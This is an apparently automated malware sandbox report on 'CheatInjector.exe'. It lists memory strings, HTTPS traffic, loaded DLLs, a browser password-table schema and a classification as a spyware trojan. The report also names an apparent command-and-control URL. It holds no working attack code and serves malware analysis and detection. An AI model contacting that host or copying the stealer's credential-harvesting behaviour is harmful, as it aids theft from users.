              Source: CheatInjector.exe, 00000001.00000003.1880946723.0000000001624000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1904792982.0000000001624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store:443/apic
              Source: CheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: CheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: CheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: CheatInjector.exe, 00000001.00000003.1834901251.0000000001654000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: CheatInjector.exe, 00000001.00000003.1793878352.0000000003C7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: CheatInjector.exe, 00000001.00000003.1834378495.0000000003D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: CheatInjector.exe, 00000001.00000003.1834378495.0000000003D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: CheatInjector.exe, 00000001.00000003.1793878352.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: CheatInjector.exe, 00000001.00000003.1793878352.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: CheatInjector.exe, 00000001.00000003.1834901251.0000000001654000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: CheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: CheatInjector.exe, 00000001.00000003.1834901251.0000000001654000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: CheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: CheatInjector.exe, 00000001.00000003.1834378495.0000000003D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: CheatInjector.exe, 00000001.00000003.1834378495.0000000003D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: CheatInjector.exe, 00000001.00000003.1834378495.0000000003D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: CheatInjector.exe, 00000001.00000003.1834378495.0000000003D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: CheatInjector.exe, 00000001.00000003.1834378495.0000000003D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49746 version: TLS 1.2
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0050A05C0_2_0050A05C
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_005120700_2_00512070
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_005221C00_2_005221C0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004F81810_2_004F8181
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004FC2300_2_004FC230
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004F63F00_2_004F63F0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004D04700_2_004D0470
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0051E4350_2_0051E435
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0051E4CB0_2_0051E4CB
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_005184BB0_2_005184BB
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_005305550_2_00530555
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0051E50B0_2_0051E50B
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_005066E70_2_005066E7
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004FA7000_2_004FA700
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0051A7320_2_0051A732
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004FC7300_2_004FC730
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0050E7800_2_0050E780
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004CE8210_2_004CE821
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004D88230_2_004D8823
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0050C9950_2_0050C995
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_00520B450_2_00520B45
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004CEB690_2_004CEB69
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004F8B300_2_004F8B30
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0051EC6D0_2_0051EC6D
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004C4C860_2_004C4C86
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_00510D500_2_00510D50
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0050CDF20_2_0050CDF2
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004D4E130_2_004D4E13
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_00530F300_2_00530F30
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004FF0B50_2_004FF0B5
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004DF1750_2_004DF175
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004C710C0_2_004C710C
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004F91000_2_004F9100
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0051F1C80_2_0051F1C8
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_005292000_2_00529200
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_005333500_2_00533350
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0050335D0_2_0050335D
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004FD3E00_2_004FD3E0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0050544A0_2_0050544A
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0051D4700_2_0051D470
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_005294600_2_00529460
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_005314100_2_00531410
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0051F4170_2_0051F417
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0051B4200_2_0051B420
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004EF4300_2_004EF430
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_005194D00_2_005194D0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0052D4C00_2_0052D4C0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_005154E00_2_005154E0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_005335E00_2_005335E0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_005116900_2_00511690
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_005136A00_2_005136A0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004EF7580_2_004EF758
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004F97600_2_004F9760
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004EF7050_2_004EF705
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004FF83D0_2_004FF83D
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_005338C00_2_005338C0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004F38D00_2_004F38D0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_005238900_2_00523890
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004F39690_2_004F3969
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004F59D00_2_004F59D0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_00511A000_2_00511A00
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_00523AF00_2_00523AF0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_00529B400_2_00529B40
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004F9BF00_2_004F9BF0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_00533BA00_2_00533BA0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_0050FCA60_2_0050FCA6
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_00521D700_2_00521D70
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004F1D100_2_004F1D10
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_00503FE70_2_00503FE7
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: String function: 004FB240 appears 96 times
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: String function: 004C79D0 appears 54 times
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: String function: 004FC920 appears 147 times
              Source: C:\Users\user\Desktop\CheatInjector.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 280
              Source: CheatInjector.exe, 00000000.00000000.1751124077.0000000000545000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePrint.Exej% vs CheatInjector.exe
              Source: CheatInjector.exe, 00000001.00000003.1759771402.000000000149A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrint.Exej% vs CheatInjector.exe
              Source: CheatInjector.exe, 00000001.00000000.1759590384.0000000000545000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePrint.Exej% vs CheatInjector.exe
              Source: CheatInjector.exeBinary or memory string: OriginalFilenamePrint.Exej% vs CheatInjector.exe
              Source: CheatInjector.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: CheatInjector.exeStatic PE information: Section: .data ZLIB complexity 0.9910992059806835
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/6@3/1
              Source: C:\Users\user\Desktop\CheatInjector.exeFile created: C:\Users\user\Desktop\static.libJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2996
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\41a537b0-8035-4351-9b8e-a553c7448e79Jump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeCommand line argument: Window10_2_004C59D6
              Source: C:\Users\user\Desktop\CheatInjector.exeCommand line argument: static.lib0_2_004C59D6
              Source: C:\Users\user\Desktop\CheatInjector.exeCommand line argument: static.lib0_2_004C59D6
              Source: C:\Users\user\Desktop\CheatInjector.exeCommand line argument: static.lib0_2_004C59D6
              Source: C:\Users\user\Desktop\CheatInjector.exeCommand line argument: n6N0_2_004E35C0
              Source: CheatInjector.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\CheatInjector.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: CheatInjector.exe, 00000001.00000003.1794156213.0000000003C39000.00000004.00000800.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1794003688.0000000003C54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: CheatInjector.exeReversingLabs: Detection: 47%
              Source: CheatInjector.exeVirustotal: Detection: 57%
              Source: C:\Users\user\Desktop\CheatInjector.exeFile read: C:\Users\user\Desktop\CheatInjector.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\CheatInjector.exe "C:\Users\user\Desktop\CheatInjector.exe"
              Source: C:\Users\user\Desktop\CheatInjector.exeProcess created: C:\Users\user\Desktop\CheatInjector.exe "C:\Users\user\Desktop\CheatInjector.exe"
              Source: C:\Users\user\Desktop\CheatInjector.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 280
              Source: C:\Users\user\Desktop\CheatInjector.exeProcess created: C:\Users\user\Desktop\CheatInjector.exe "C:\Users\user\Desktop\CheatInjector.exe"Jump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: CheatInjector.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: CheatInjector.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: CheatInjector.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: CheatInjector.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: CheatInjector.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: CheatInjector.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: CheatInjector.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: CheatInjector.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: CheatInjector.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: CheatInjector.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: CheatInjector.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: CheatInjector.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: CheatInjector.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_00526313 push esp; iretd 0_2_00526315
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004C6B5A push ecx; ret 0_2_004C6B6D
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004C511C push eax; ret 0_2_004C517C
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C305FD push edi; ret 1_3_03C30600
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C305FD push edi; ret 1_3_03C30600
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C305FD push edi; ret 1_3_03C30600
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C306A4 push 2B67444Ch; ret 1_3_03C306A9
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C306A4 push 2B67444Ch; ret 1_3_03C306A9
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C306A4 push 2B67444Ch; ret 1_3_03C306A9
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C318AA push 00000161h; ret 1_3_03C318D2
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C318AA push 00000161h; ret 1_3_03C318D2
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C318AA push 00000161h; ret 1_3_03C318D2
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C30550 push ebp; ret 1_3_03C30559
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C30550 push ebp; ret 1_3_03C30559
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C30550 push ebp; ret 1_3_03C30559
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C3077D push cs; ret 1_3_03C30781
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C3077D push cs; ret 1_3_03C30781
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C3077D push cs; ret 1_3_03C30781
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C3053B push esi; ret 1_3_03C30541
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C3053B push esi; ret 1_3_03C30541
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C3053B push esi; ret 1_3_03C30541
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_01643074 push eax; retf 1_3_01643089
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C305FD push edi; ret 1_3_03C30600
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C305FD push edi; ret 1_3_03C30600
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C305FD push edi; ret 1_3_03C30600
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C306A4 push 2B67444Ch; ret 1_3_03C306A9
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C306A4 push 2B67444Ch; ret 1_3_03C306A9
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C306A4 push 2B67444Ch; ret 1_3_03C306A9
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C318AA push 00000161h; ret 1_3_03C318D2
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C318AA push 00000161h; ret 1_3_03C318D2
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 1_3_03C318AA push 00000161h; ret 1_3_03C318D2
              Source: C:\Users\user\Desktop\CheatInjector.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
